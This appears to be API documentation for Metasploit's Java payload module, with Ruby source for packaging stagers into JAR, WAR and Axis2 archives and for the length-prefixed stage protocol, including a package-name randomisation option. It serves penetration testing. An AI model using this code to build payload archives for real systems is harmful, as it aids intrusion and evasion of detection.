Module: Msf::Payload::Java

Included in:
BindTcp, MeterpreterLoader, ReverseHttp, ReverseTcp
Defined in:
lib/msf/core/payload/java.rb

Defined Under Namespace

Modules: BindTcp, MeterpreterLoader, PayloadOptions, ReverseHttp, ReverseHttps, ReverseTcp


Instance Method Details

#class_files ⇒ Object

Default to no extra class files


# File 'lib/msf/core/payload/java.rb', line 150

# Extra class files to bundle next to the fixed metasploit/ entries when an
# archive is generated. The base module contributes none; stagers provide
# their own list by overriding this method.
#
# @return [Array] an empty list (presumably entries are path-component
#   arrays like the ones the generators build -- confirm against overriders)
def class_files
  # A fresh array on every call, exactly as a `[]` literal would give.
  Array.new
end

#generate(opts = {}) ⇒ Object

Used by stagers to construct the payload jar file as a String


# File 'lib/msf/core/payload/java.rb', line 35

# Builds the payload jar through #generate_jar and serialises it.
#
# @param opts [Hash] passed unchanged to #generate_jar
# @return [Object] whatever the jar's #pack returns (the page describes it
#   as the jar file as a String)
def generate(opts={})
  jar = generate_jar(opts)
  jar.pack
end

#generate_axis2(opts = {}) ⇒ Rex::Zip::Jar

Used by stagers to create an axis2 webservice file as a Rex::Zip::Jar. Stagers define a list of class files returned via class_files. The configuration file is created by the payload's #stager_config method.

Parameters:

  • :app_name (Hash)

    a customizable set of options

Returns:

  • (Rex::Zip::Jar)

# File 'lib/msf/core/payload/java.rb', line 120

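# Builds an Axis2 web service archive for a stager.
#
# The archive contains a generated META-INF/services.xml, the fixed
# metasploit/Payload.class and metasploit/PayloadServlet.class entries plus
# whatever #class_files returns, and the stager configuration written to
# metasploit.dat. All of those entry names, and the ServiceClass value in
# services.xml, are literals in this method.
#
# @param opts [Hash] options; also handed unchanged to #stager_config
# @option opts [String] :app_name service name; when absent a random
#   lowercase alphabetic name of 8 to 15 characters is used
# @return [Rex::Zip::Jar]
# @raise [RuntimeError] if the including payload does not respond to
#   #stager_config
def generate_axis2(opts={})
  # A bare `raise` here used to surface as "unhandled exception"; keep the
  # RuntimeError but say what is actually missing.
  unless respond_to?(:stager_config)
    raise "#{self.class} must define #stager_config to generate an Axis2 archive"
  end

  app_name = opts[:app_name] || Rex::Text.rand_text_alpha_lower(rand(8)+8)

  # NOTE(review): app_name is interpolated verbatim into an XML attribute.
  # A caller-supplied value containing quotes or angle brackets yields a
  # malformed services.xml -- callers must pass an XML-safe name.
  services_xml = %Q{<service name="#{app_name}" scope="application">
<description>#{Rex::Text.rand_text_alphanumeric(50 + rand(50))}</description>
<parameter name="ServiceClass">metasploit.PayloadServlet</parameter>
<operation name="run">
 <messageReceiver mep="http://www.w3.org/2004/08/wsdl/in-out" class="org.apache.axis2.rpc.receivers.RPCMessageReceiver"/>
</operation>
</service>
}

  paths = [
    [ 'metasploit', 'Payload.class' ],
    [ 'metasploit', 'PayloadServlet.class' ]
  ] + class_files

  zip = Rex::Zip::Jar.new
  zip.add_file('META-INF/', '')
  zip.add_file('META-INF/services.xml', services_xml)
  zip.add_files(paths, MetasploitPayloads.path('java'))
  zip.add_file('metasploit.dat', stager_config(opts))
  zip.build_manifest(:app_name => app_name)

  zip
end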

#generate_default_stage(opts = {}) ⇒ Object


# File 'lib/msf/core/payload/java.rb', line 21

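# Serialises every file listed by #stage_class_files into the staging wire
# format: each file is preceded by its size as a 32-bit big-endian integer,
# and a 32-bit zero terminates the sequence.
#
# @param opts [Hash] accepted for interface compatibility; not read here
# @return [String] the framed stage as a binary string
def generate_default_stage(opts={})
  # Explicit binary, unfrozen buffer: safe to append to even if the file
  # enables frozen string literals.
  stage = String.new
  stage_class_files.each do |path|
    data = MetasploitPayloads.read('java', path)
    # The prefix must count bytes, not characters. String#length counts
    # characters when the data carries a multibyte encoding, which would
    # desynchronise the receiver's framing; bytesize is always the byte count.
    stage << [data.bytesize, data].pack('NA*')
  end
  # Zero-length record marks the end of the class list.
  stage << [0].pack('N')

  stage
end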

#generate_jar(opts = {}) ⇒ Rex::Zip::Jar

Used by stagers to create a jar file as a Rex::Zip::Jar. Stagers define a list of class files from the class_files method. The configuration file is created by the payload's #stager_config method.

Parameters:

  • opts (Hash) (defaults to: {})

    a customizable set of options

Options Hash (opts):

  • :main_class (String)

    the name of the Main-Class attribute in the manifest. Defaults to "metasploit.Payload"

  • :random (Boolean)

    Set to `true` to randomize the "metasploit" package name.

Returns:

  • (Rex::Zip::Jar)

# File 'lib/msf/core/payload/java.rb', line 49

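# Builds the stager jar as a Rex::Zip::Jar.
#
# The jar contains metasploit/Payload.class plus whatever #class_files
# returns, the stager configuration written to metasploit.dat, and a
# manifest naming the main class.
#
# @param opts [Hash] options; also handed unchanged to #stager_config
# @option opts [String] :main_class value for the manifest's Main-Class
#   attribute; defaults to "metasploit.Payload"
# @option opts [Boolean] :random when truthy, registers a substitution for
#   the "metasploit" package name via Rex::Zip::Jar#add_sub
# @return [Rex::Zip::Jar]
# @raise [RuntimeError] if the including payload does not respond to
#   #stager_config
def generate_jar(opts={})
  # A bare `raise` here used to surface as "unhandled exception"; keep the
  # RuntimeError but say what is actually missing.
  unless respond_to?(:stager_config)
    raise "#{self.class} must define #stager_config to generate a jar"
  end

  # Allow changing the jar's Main Class in the manifest so wrappers
  # around metasploit.Payload will work.
  main_class = opts[:main_class] || "metasploit.Payload"

  paths = [
    [ "metasploit", "Payload.class" ],
  ] + class_files

  jar = Rex::Zip::Jar.new
  # Registered before any file is added, as in the original ordering.
  jar.add_sub("metasploit") if opts[:random]
  jar.add_file("metasploit.dat", stager_config(opts))
  jar.add_files(paths, MetasploitPayloads.path('java'))
  jar.build_manifest(:main_class => main_class)

  jar
end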

#generate_stage(opts = {}) ⇒ Object

Used by stages; all java stages need to define stage_class_files as an array of .class files located in data/java/

The staging protocol expects any number of class files, each prepended with its length, and terminated with a 0:

[ 32-bit big endian length ][ first raw .class file ]
...
[ 32-bit big endian length ][ Nth raw .class file ]
[ 32-bit null ]

# File 'lib/msf/core/payload/java.rb', line 17

# Entry point used by stages. This base version simply returns what
# #generate_default_stage produces for the same options.
#
# @param opts [Hash] passed unchanged to #generate_default_stage
# @return [Object] the result of #generate_default_stage
def generate_stage(opts={})
  default_stage = generate_default_stage(opts)
  default_stage
end

#generate_war(opts = {}) ⇒ Object

Like #generate_jar, this method is used by stagers to create a war file as a Rex::Zip::Jar object.

Parameters:

  • opts (Hash) (defaults to: {})
  • :app_name (Hash)

    a customizable set of options


# File 'lib/msf/core/payload/java.rb', line 76

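# Builds a WAR archive for a stager, returned as a Rex::Zip::Jar.
#
# The archive contains a generated WEB-INF/web.xml that maps every URL to
# the metasploit.PayloadServlet class, the fixed metasploit/Payload.class
# and metasploit/PayloadServlet.class entries plus whatever #class_files
# returns under WEB-INF/classes/, and the stager configuration written to
# WEB-INF/classes/metasploit.dat.
#
# @param opts [Hash] options; also handed unchanged to #stager_config
# @option opts [String] :app_name servlet name written into web.xml; when
#   absent a random lowercase alphabetic name of 8 to 15 characters is used
# @return [Rex::Zip::Jar]
# @raise [RuntimeError] if the including payload does not respond to
#   #stager_config
def generate_war(opts={})
  # A bare `raise` here used to surface as "unhandled exception"; keep the
  # RuntimeError but say what is actually missing.
  unless respond_to?(:stager_config)
    raise "#{self.class} must define #stager_config to generate a WAR archive"
  end

  zip = Rex::Zip::Jar.new

  web_xml_template = %q{<?xml version="1.0"?>
<!DOCTYPE web-app PUBLIC
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
"http://java.sun.com/dtd/web-app_2_3.dtd">
<web-app>
<servlet>
<servlet-name>NAME</servlet-name>
<servlet-class>metasploit.PayloadServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>NAME</servlet-name>
<url-pattern>/*</url-pattern>
</servlet-mapping>
</web-app>
}
  app_name = opts[:app_name] || Rex::Text.rand_text_alpha_lower(rand(8)+8)

  # Block form inserts app_name literally. With a replacement *string*,
  # gsub interprets backslash sequences such as \0 or \1 inside app_name.
  # The non-bang form also leaves the template literal unmodified.
  # NOTE(review): app_name is still not XML-escaped; callers must pass an
  # XML-safe name.
  web_xml = web_xml_template.gsub('NAME') { app_name }

  paths = [
    [ "metasploit", "Payload.class" ],
    [ "metasploit", "PayloadServlet.class" ],
  ] + class_files

  zip.add_file('WEB-INF/', '')
  zip.add_file('WEB-INF/web.xml', web_xml)
  zip.add_file("WEB-INF/classes/", "")
  zip.add_files(paths, MetasploitPayloads.path('java'), 'WEB-INF/classes/')
  zip.add_file("WEB-INF/classes/metasploit.dat", stager_config(opts))

  zip
end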

#stage_class_files ⇒ Object

Default to no extra stage class files


# File 'lib/msf/core/payload/java.rb', line 155

# Class files that make up the stage. The base module lists none; the page
# states that Java stages define this as an array of .class files located
# in data/java/.
#
# @return [Array] an empty list
def stage_class_files
  # A fresh array on every call, exactly as a `[]` literal would give.
  Array.new
end